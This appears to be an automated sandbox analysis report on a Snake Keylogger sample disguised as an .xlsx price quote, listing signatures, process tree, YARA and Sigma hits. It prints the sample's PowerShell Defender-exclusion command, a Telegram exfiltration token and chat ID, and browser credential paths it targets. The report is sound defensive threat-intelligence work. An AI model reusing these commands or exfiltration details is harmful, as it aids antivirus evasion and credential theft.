Edit tour

Windows Analysis Report
ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe

Overview

General Information

Sample name:	ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe
Analysis ID:	1528229
MD5:	acdb58c5abad0535de184d32c04c75a5
SHA1:	7323524e5f90cbc698ce33f2bdd00e62c3694943
SHA256:	61460220761a54e3263ca427e082c7542bd531ed5c2aae397757be3cb313bb74
Tags:	exeuser-lowmal3
Infos:

Detection

Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected Snake Keylogger

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates processes with suspicious names

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara signature match

Classification

Process Tree

System is w10x64

ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe (PID: 280 cmdline: "C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe" MD5: ACDB58C5ABAD0535DE184D32C04C75A5)

powershell.exe (PID: 6868 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe (PID: 6308 cmdline: "C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe" MD5: ACDB58C5ABAD0535DE184D32C04C75A5)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc", "Chat_id": "-4209622687", "Version": "5.1"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.4109948122.0000000002DED000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000003.00000002.4107406678.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000003.00000002.4107406678.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1448d:$a1: get_encryptedPassword 0x14771:$a2: get_encryptedUsername 0x14299:$a3: get_timePasswordChanged 0x14394:$a4: get_passwordField 0x144a3:$a5: set_encryptedPassword 0x15b13:$a7: get_logins 0x15a76:$a10: KeyLoggerEventArgs 0x156e1:$a11: KeyLoggerEventArgsEventHandler
00000003.00000002.4107406678.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19460:$x1: $%SMTPDV$ 0x17e3c:$x2: $#TheHashHere%& 0x19408:$x3: %FTPDV$ 0x17ddc:$x4: $%TelegramDv$ 0x156e1:$x5: KeyLoggerEventArgs 0x15a76:$x5: KeyLoggerEventArgs 0x1942c:$m2: Clipboard Logs ID 0x1966a:$m2: Screenshot Logs ID 0x1977a:$m2: keystroke Logs ID 0x19a54:$m3: SnakePW 0x19642:$m4: \SnakeKeylogger\
00000000.00000002.1716836366.000000000387A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1716836366.000000000387A000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x7783d:$a1: get_encryptedPassword 0x97c5d:$a1: get_encryptedPassword 0xb7e7d:$a1: get_encryptedPassword 0x77b21:$a2: get_encryptedUsername 0x97f41:$a2: get_encryptedUsername 0xb8161:$a2: get_encryptedUsername 0x77649:$a3: get_timePasswordChanged 0x97a69:$a3: get_timePasswordChanged 0xb7c89:$a3: get_timePasswordChanged 0x77744:$a4: get_passwordField 0x97b64:$a4: get_passwordField 0xb7d84:$a4: get_passwordField 0x77853:$a5: set_encryptedPassword 0x97c73:$a5: set_encryptedPassword 0xb7e93:$a5: set_encryptedPassword 0x78ec3:$a7: get_logins 0x992e3:$a7: get_logins 0xb9503:$a7: get_logins 0x78e26:$a10: KeyLoggerEventArgs 0x99246:$a10: KeyLoggerEventArgs 0xb9466:$a10: KeyLoggerEventArgs
00000000.00000002.1716836366.000000000387A000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x7c810:$x1: $%SMTPDV$ 0x9cc30:$x1: $%SMTPDV$ 0xbce50:$x1: $%SMTPDV$ 0x7b1ec:$x2: $#TheHashHere%& 0x9b60c:$x2: $#TheHashHere%& 0xbb82c:$x2: $#TheHashHere%& 0x7c7b8:$x3: %FTPDV$ 0x9cbd8:$x3: %FTPDV$ 0xbcdf8:$x3: %FTPDV$ 0x7b18c:$x4: $%TelegramDv$ 0x9b5ac:$x4: $%TelegramDv$ 0xbb7cc:$x4: $%TelegramDv$ 0x78a91:$x5: KeyLoggerEventArgs 0x78e26:$x5: KeyLoggerEventArgs 0x98eb1:$x5: KeyLoggerEventArgs 0x99246:$x5: KeyLoggerEventArgs 0xb90d1:$x5: KeyLoggerEventArgs 0xb9466:$x5: KeyLoggerEventArgs 0x7c7dc:$m2: Clipboard Logs ID 0x7ca1a:$m2: Screenshot Logs ID 0x7cb2a:$m2: keystroke Logs ID
00000003.00000002.4109948122.0000000002C21000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe PID: 280	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe PID: 280	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe PID: 280	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x9037f:$a1: get_encryptedPassword 0x90578:$a2: get_encryptedUsername 0x901a8:$a3: get_timePasswordChanged 0x90297:$a4: get_passwordField 0x90395:$a5: set_encryptedPassword 0x922f7:$a7: get_logins 0x9226f:$a10: KeyLoggerEventArgs 0x91ffa:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe PID: 280	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x91ffa:$x5: KeyLoggerEventArgs 0x9226f:$x5: KeyLoggerEventArgs 0x92a94:$x5: KeyLoggerEventArgs 0x92df5:$x5: KeyLoggerEventArgs 0x9436d:$m2: Clipboard Logs ID 0x94473:$m2: Screenshot Logs ID 0x944c9:$m2: keystroke Logs ID 0x945fe:$m3: SnakePW 0x9445f:$m4: \SnakeKeylogger\
Process Memory Space: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe PID: 6308	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe PID: 6308	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x270a4:$a1: get_encryptedPassword 0x2737e:$a2: get_encryptedUsername 0x26eba:$a3: get_timePasswordChanged 0x26fb5:$a4: get_passwordField 0x270ba:$a5: set_encryptedPassword 0x29569:$a7: get_logins 0x294cc:$a10: KeyLoggerEventArgs 0x29137:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe PID: 6308	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x29137:$x5: KeyLoggerEventArgs 0x294cc:$x5: KeyLoggerEventArgs 0x29dd3:$x5: KeyLoggerEventArgs 0x2a134:$x5: KeyLoggerEventArgs 0x2b6fb:$m2: Clipboard Logs ID 0x2b801:$m2: Screenshot Logs ID 0x2b857:$m2: keystroke Logs ID 0x2b98c:$m3: SnakePW 0x2b7ed:$m4: \SnakeKeylogger\
Click to see the 10 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.400000.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
3.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1468d:$a1: get_encryptedPassword 0x14971:$a2: get_encryptedUsername 0x14499:$a3: get_timePasswordChanged 0x14594:$a4: get_passwordField 0x146a3:$a5: set_encryptedPassword 0x15d13:$a7: get_logins 0x15c76:$a10: KeyLoggerEventArgs 0x158e1:$a11: KeyLoggerEventArgsEventHandler
3.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c04e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b280:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b6b3:$a4: \Orbitum\User Data\Default\Login Data 0x1c6f2:$a5: \Kometa\User Data\Default\Login Data
3.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15262:$s1: UnHook 0x15269:$s2: SetHook 0x15271:$s3: CallNextHook 0x1527e:$s4: _hook
3.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.400000.0.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19660:$x1: $%SMTPDV$ 0x1803c:$x2: $#TheHashHere%& 0x19608:$x3: %FTPDV$ 0x17fdc:$x4: $%TelegramDv$ 0x158e1:$x5: KeyLoggerEventArgs 0x15c76:$x5: KeyLoggerEventArgs 0x1962c:$m2: Clipboard Logs ID 0x1986a:$m2: Screenshot Logs ID 0x1997a:$m2: keystroke Logs ID 0x19c54:$m3: SnakePW 0x19842:$m4: \SnakeKeylogger\
0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38fd5d0.2.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38fd5d0.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1288d:$a1: get_encryptedPassword 0x12b71:$a2: get_encryptedUsername 0x12699:$a3: get_timePasswordChanged 0x12794:$a4: get_passwordField 0x128a3:$a5: set_encryptedPassword 0x13f13:$a7: get_logins 0x13e76:$a10: KeyLoggerEventArgs 0x13ae1:$a11: KeyLoggerEventArgsEventHandler
0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38fd5d0.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a24e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x19480:$a3: \Google\Chrome\User Data\Default\Login Data 0x198b3:$a4: \Orbitum\User Data\Default\Login Data 0x1a8f2:$a5: \Kometa\User Data\Default\Login Data
0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38fd5d0.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13462:$s1: UnHook 0x13469:$s2: SetHook 0x13471:$s3: CallNextHook 0x1347e:$s4: _hook
0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38fd5d0.2.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17860:$x1: $%SMTPDV$ 0x1623c:$x2: $#TheHashHere%& 0x17808:$x3: %FTPDV$ 0x161dc:$x4: $%TelegramDv$ 0x13ae1:$x5: KeyLoggerEventArgs 0x13e76:$x5: KeyLoggerEventArgs 0x1782c:$m2: Clipboard Logs ID 0x17a6a:$m2: Screenshot Logs ID 0x17b7a:$m2: keystroke Logs ID 0x17e54:$m3: SnakePW 0x17a42:$m4: \SnakeKeylogger\
0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38dd1b0.1.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38dd1b0.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1288d:$a1: get_encryptedPassword 0x12b71:$a2: get_encryptedUsername 0x12699:$a3: get_timePasswordChanged 0x12794:$a4: get_passwordField 0x128a3:$a5: set_encryptedPassword 0x13f13:$a7: get_logins 0x13e76:$a10: KeyLoggerEventArgs 0x13ae1:$a11: KeyLoggerEventArgsEventHandler
0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38dd1b0.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a24e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x19480:$a3: \Google\Chrome\User Data\Default\Login Data 0x198b3:$a4: \Orbitum\User Data\Default\Login Data 0x1a8f2:$a5: \Kometa\User Data\Default\Login Data
0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38dd1b0.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13462:$s1: UnHook 0x13469:$s2: SetHook 0x13471:$s3: CallNextHook 0x1347e:$s4: _hook
0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38dd1b0.1.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17860:$x1: $%SMTPDV$ 0x1623c:$x2: $#TheHashHere%& 0x17808:$x3: %FTPDV$ 0x161dc:$x4: $%TelegramDv$ 0x13ae1:$x5: KeyLoggerEventArgs 0x13e76:$x5: KeyLoggerEventArgs 0x1782c:$m2: Clipboard Logs ID 0x17a6a:$m2: Screenshot Logs ID 0x17b7a:$m2: keystroke Logs ID 0x17e54:$m3: SnakePW 0x17a42:$m4: \SnakeKeylogger\
0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38fd5d0.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38fd5d0.2.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38fd5d0.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1468d:$a1: get_encryptedPassword 0x348ad:$a1: get_encryptedPassword 0x14971:$a2: get_encryptedUsername 0x34b91:$a2: get_encryptedUsername 0x14499:$a3: get_timePasswordChanged 0x346b9:$a3: get_timePasswordChanged 0x14594:$a4: get_passwordField 0x347b4:$a4: get_passwordField 0x146a3:$a5: set_encryptedPassword 0x348c3:$a5: set_encryptedPassword 0x15d13:$a7: get_logins 0x35f33:$a7: get_logins 0x15c76:$a10: KeyLoggerEventArgs 0x35e96:$a10: KeyLoggerEventArgs 0x158e1:$a11: KeyLoggerEventArgsEventHandler 0x35b01:$a11: KeyLoggerEventArgsEventHandler
0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38fd5d0.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c04e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3c26e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b280:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b4a0:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b6b3:$a4: \Orbitum\User Data\Default\Login Data 0x3b8d3:$a4: \Orbitum\User Data\Default\Login Data 0x1c6f2:$a5: \Kometa\User Data\Default\Login Data 0x3c912:$a5: \Kometa\User Data\Default\Login Data
0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38fd5d0.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15262:$s1: UnHook 0x35482:$s1: UnHook 0x15269:$s2: SetHook 0x35489:$s2: SetHook 0x15271:$s3: CallNextHook 0x35491:$s3: CallNextHook 0x1527e:$s4: _hook 0x3549e:$s4: _hook
0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38fd5d0.2.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19660:$x1: $%SMTPDV$ 0x39880:$x1: $%SMTPDV$ 0x1803c:$x2: $#TheHashHere%& 0x3825c:$x2: $#TheHashHere%& 0x19608:$x3: %FTPDV$ 0x39828:$x3: %FTPDV$ 0x17fdc:$x4: $%TelegramDv$ 0x381fc:$x4: $%TelegramDv$ 0x158e1:$x5: KeyLoggerEventArgs 0x15c76:$x5: KeyLoggerEventArgs 0x35b01:$x5: KeyLoggerEventArgs 0x35e96:$x5: KeyLoggerEventArgs 0x1962c:$m2: Clipboard Logs ID 0x1986a:$m2: Screenshot Logs ID 0x1997a:$m2: keystroke Logs ID 0x3984c:$m2: Clipboard Logs ID 0x39a8a:$m2: Screenshot Logs ID 0x39b9a:$m2: keystroke Logs ID 0x19c54:$m3: SnakePW 0x39e74:$m3: SnakePW 0x19842:$m4: \SnakeKeylogger\
0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38dd1b0.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38dd1b0.1.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38dd1b0.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1468d:$a1: get_encryptedPassword 0x34aad:$a1: get_encryptedPassword 0x54ccd:$a1: get_encryptedPassword 0x14971:$a2: get_encryptedUsername 0x34d91:$a2: get_encryptedUsername 0x54fb1:$a2: get_encryptedUsername 0x14499:$a3: get_timePasswordChanged 0x348b9:$a3: get_timePasswordChanged 0x54ad9:$a3: get_timePasswordChanged 0x14594:$a4: get_passwordField 0x349b4:$a4: get_passwordField 0x54bd4:$a4: get_passwordField 0x146a3:$a5: set_encryptedPassword 0x34ac3:$a5: set_encryptedPassword 0x54ce3:$a5: set_encryptedPassword 0x15d13:$a7: get_logins 0x36133:$a7: get_logins 0x56353:$a7: get_logins 0x15c76:$a10: KeyLoggerEventArgs 0x36096:$a10: KeyLoggerEventArgs 0x562b6:$a10: KeyLoggerEventArgs
0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38dd1b0.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c04e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3c46e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x5c68e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b280:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b6a0:$a3: \Google\Chrome\User Data\Default\Login Data 0x5b8c0:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b6b3:$a4: \Orbitum\User Data\Default\Login Data 0x3bad3:$a4: \Orbitum\User Data\Default\Login Data 0x5bcf3:$a4: \Orbitum\User Data\Default\Login Data 0x1c6f2:$a5: \Kometa\User Data\Default\Login Data 0x3cb12:$a5: \Kometa\User Data\Default\Login Data 0x5cd32:$a5: \Kometa\User Data\Default\Login Data
0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38dd1b0.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15262:$s1: UnHook 0x35682:$s1: UnHook 0x558a2:$s1: UnHook 0x15269:$s2: SetHook 0x35689:$s2: SetHook 0x558a9:$s2: SetHook 0x15271:$s3: CallNextHook 0x35691:$s3: CallNextHook 0x558b1:$s3: CallNextHook 0x1527e:$s4: _hook 0x3569e:$s4: _hook 0x558be:$s4: _hook
0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38dd1b0.1.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19660:$x1: $%SMTPDV$ 0x39a80:$x1: $%SMTPDV$ 0x59ca0:$x1: $%SMTPDV$ 0x1803c:$x2: $#TheHashHere%& 0x3845c:$x2: $#TheHashHere%& 0x5867c:$x2: $#TheHashHere%& 0x19608:$x3: %FTPDV$ 0x39a28:$x3: %FTPDV$ 0x59c48:$x3: %FTPDV$ 0x17fdc:$x4: $%TelegramDv$ 0x383fc:$x4: $%TelegramDv$ 0x5861c:$x4: $%TelegramDv$ 0x158e1:$x5: KeyLoggerEventArgs 0x15c76:$x5: KeyLoggerEventArgs 0x35d01:$x5: KeyLoggerEventArgs 0x36096:$x5: KeyLoggerEventArgs 0x55f21:$x5: KeyLoggerEventArgs 0x562b6:$x5: KeyLoggerEventArgs 0x1962c:$m2: Clipboard Logs ID 0x1986a:$m2: Screenshot Logs ID 0x1997a:$m2: keystroke Logs ID
0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.387b590.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.387b590.3.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.387b590.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x762ad:$a1: get_encryptedPassword 0x966cd:$a1: get_encryptedPassword 0xb68ed:$a1: get_encryptedPassword 0x76591:$a2: get_encryptedUsername 0x969b1:$a2: get_encryptedUsername 0xb6bd1:$a2: get_encryptedUsername 0x760b9:$a3: get_timePasswordChanged 0x964d9:$a3: get_timePasswordChanged 0xb66f9:$a3: get_timePasswordChanged 0x761b4:$a4: get_passwordField 0x965d4:$a4: get_passwordField 0xb67f4:$a4: get_passwordField 0x762c3:$a5: set_encryptedPassword 0x966e3:$a5: set_encryptedPassword 0xb6903:$a5: set_encryptedPassword 0x77933:$a7: get_logins 0x97d53:$a7: get_logins 0xb7f73:$a7: get_logins 0x77896:$a10: KeyLoggerEventArgs 0x97cb6:$a10: KeyLoggerEventArgs 0xb7ed6:$a10: KeyLoggerEventArgs
0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.387b590.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x7dc6e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x9e08e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xbe2ae:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7cea0:$a3: \Google\Chrome\User Data\Default\Login Data 0x9d2c0:$a3: \Google\Chrome\User Data\Default\Login Data 0xbd4e0:$a3: \Google\Chrome\User Data\Default\Login Data 0x7d2d3:$a4: \Orbitum\User Data\Default\Login Data 0x9d6f3:$a4: \Orbitum\User Data\Default\Login Data 0xbd913:$a4: \Orbitum\User Data\Default\Login Data 0x7e312:$a5: \Kometa\User Data\Default\Login Data 0x9e732:$a5: \Kometa\User Data\Default\Login Data 0xbe952:$a5: \Kometa\User Data\Default\Login Data
0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.387b590.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x76e82:$s1: UnHook 0x972a2:$s1: UnHook 0xb74c2:$s1: UnHook 0x76e89:$s2: SetHook 0x972a9:$s2: SetHook 0xb74c9:$s2: SetHook 0x76e91:$s3: CallNextHook 0x972b1:$s3: CallNextHook 0xb74d1:$s3: CallNextHook 0x76e9e:$s4: _hook 0x972be:$s4: _hook 0xb74de:$s4: _hook
0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.387b590.3.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x7b280:$x1: $%SMTPDV$ 0x9b6a0:$x1: $%SMTPDV$ 0xbb8c0:$x1: $%SMTPDV$ 0x79c5c:$x2: $#TheHashHere%& 0x9a07c:$x2: $#TheHashHere%& 0xba29c:$x2: $#TheHashHere%& 0x7b228:$x3: %FTPDV$ 0x9b648:$x3: %FTPDV$ 0xbb868:$x3: %FTPDV$ 0x79bfc:$x4: $%TelegramDv$ 0x9a01c:$x4: $%TelegramDv$ 0xba23c:$x4: $%TelegramDv$ 0x77501:$x5: KeyLoggerEventArgs 0x77896:$x5: KeyLoggerEventArgs 0x97921:$x5: KeyLoggerEventArgs 0x97cb6:$x5: KeyLoggerEventArgs 0xb7b41:$x5: KeyLoggerEventArgs 0xb7ed6:$x5: KeyLoggerEventArgs 0x7b24c:$m2: Clipboard Logs ID 0x7b48a:$m2: Screenshot Logs ID 0x7b59a:$m2: keystroke Logs ID
Click to see the 29 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe", ParentImage: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, ParentProcessId: 280, ParentProcessName: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe", ProcessId: 6868, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

